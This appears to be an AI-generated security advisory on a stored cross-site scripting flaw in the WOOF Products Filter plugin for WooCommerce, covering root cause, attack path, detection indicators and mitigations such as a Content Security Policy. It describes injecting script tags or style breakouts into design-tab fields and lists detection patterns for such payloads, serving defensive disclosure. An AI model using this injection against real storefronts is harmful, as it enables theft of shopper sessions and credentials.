CVE-2020-37174 Overview
CVE-2020-37174 is a persistent cross-site scripting (XSS) vulnerability in the WOOF Products Filter for WooCommerce plugin version 1.2.3 [CWE-79]. Authenticated attackers with administrative access can inject JavaScript payloads through design tab textfields, including Text for block toggle and Custom front css styles. The injected scripts persist in the WordPress database and execute in the browsers of all site visitors when the affected frontend pages render. The flaw stems from missing input sanitization and output encoding in the plugin's settings handlers.
Critical Impact
Stored XSS payloads execute against every frontend visitor, enabling session theft, credential harvesting, and drive-by malware delivery against WooCommerce shoppers.
Affected Products
- WOOF Products Filter for WooCommerce plugin version 1.2.3
- WordPress sites using the affected plugin version with WooCommerce
- Frontend visitors of any storefront running the vulnerable plugin build
Discovery Timeline
- 2026-05-13 - CVE-2020-37174 published to the National Vulnerability Database (NVD)
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2020-37174
Vulnerability Analysis
The plugin exposes administrative configuration fields under its design tab without enforcing server-side sanitization or contextual output escaping. An authenticated administrator submits arbitrary HTML or JavaScript through fields such as Text for block toggle and Custom front css styles. The plugin stores the raw input in the WordPress options table and renders it verbatim on product filter pages. Any visitor loading a page that includes the filter widget triggers the stored payload in their browser context.
The issue is classified under [CWE-79] (Improper Neutralization of Input During Web Page Generation). Persistent XSS in a WooCommerce context exposes shopper sessions, payment workflows, and customer account data. Attackers can pivot from a single compromised administrator account or supply-chain insertion into broad customer impact across every visited page.
Root Cause
The plugin trusts administrator-supplied configuration values and writes them directly into rendered HTML and inline CSS blocks. The code path omits calls to standard WordPress escaping helpers such as esc_html(), esc_attr(), and wp_kses() before output. CSS contexts additionally lack neutralization of expression syntax and </style> breakouts.
Attack Vector
Exploitation requires authenticated access at the privilege level needed to edit plugin settings and a victim visit to a frontend page that renders the affected widget. An attacker navigates to the plugin's design tab, inserts a payload such as a <script> tag or a CSS sequence containing a script-context breakout, and saves the configuration. The payload executes against every subsequent frontend visitor.
Verified proof-of-concept details are available in the Exploit-DB entry #48088 and the VulnCheck advisory on the persistent XSS. No verified patch code is published in the NVD record.
Detection Methods for CVE-2020-37174
Indicators of Compromise
- Unexpected <script>, onerror=, or javascript: content stored in the wp_options table entries belonging to the WOOF Products Filter plugin.
- Outbound requests from visitor browsers to attacker-controlled domains originating from product filter pages.
- Modifications to plugin settings outside of normal change windows, recorded in WordPress audit logs.
Detection Strategies
- Review the plugin's stored configuration values for HTML or JavaScript tokens that should not appear in design text or CSS fields.
- Enable Content Security Policy (CSP) reporting and watch for inline-script violations triggered on storefront pages.
- Compare current plugin option values against a known-good baseline after each administrative change.
Monitoring Recommendations
- Forward WordPress and web server logs to a centralized analytics platform and alert on administrator settings changes for the WOOF Products Filter plugin.
- Monitor frontend page responses for unexpected inline script tags or suspicious CSS expressions in filter widget markup.
- Track anomalous administrator authentication events that precede modifications to plugin design fields.
How to Mitigate CVE-2020-37174
Immediate Actions Required
- Audit current values in all WOOF Products Filter design tab fields and remove any HTML, JavaScript, or CSS breakout content.
- Restrict administrative access to trusted accounts and enforce multi-factor authentication for WordPress administrators.
- Deploy a web application firewall (WAF) rule that blocks <script> and event-handler attributes in plugin settings POST requests.
Patch Information
The NVD record does not list a fixed version. Site operators should upgrade to the latest available release of the WOOF Products Filter for WooCommerce plugin and verify the changelog references sanitization of design tab inputs. If no fixed release is available, replace the plugin with an alternative or disable it.
Workarounds
- Remove the plugin from WordPress installations that do not require it and clear cached frontend pages after removal.
- Apply a strict Content Security Policy that disallows inline scripts on storefront pages to neutralize stored payloads.
- Limit the manage_options and equivalent capabilities to a minimal set of trusted administrators using role management.
# Example CSP header to block inline script execution on WooCommerce pages
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'; base-uri 'self'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
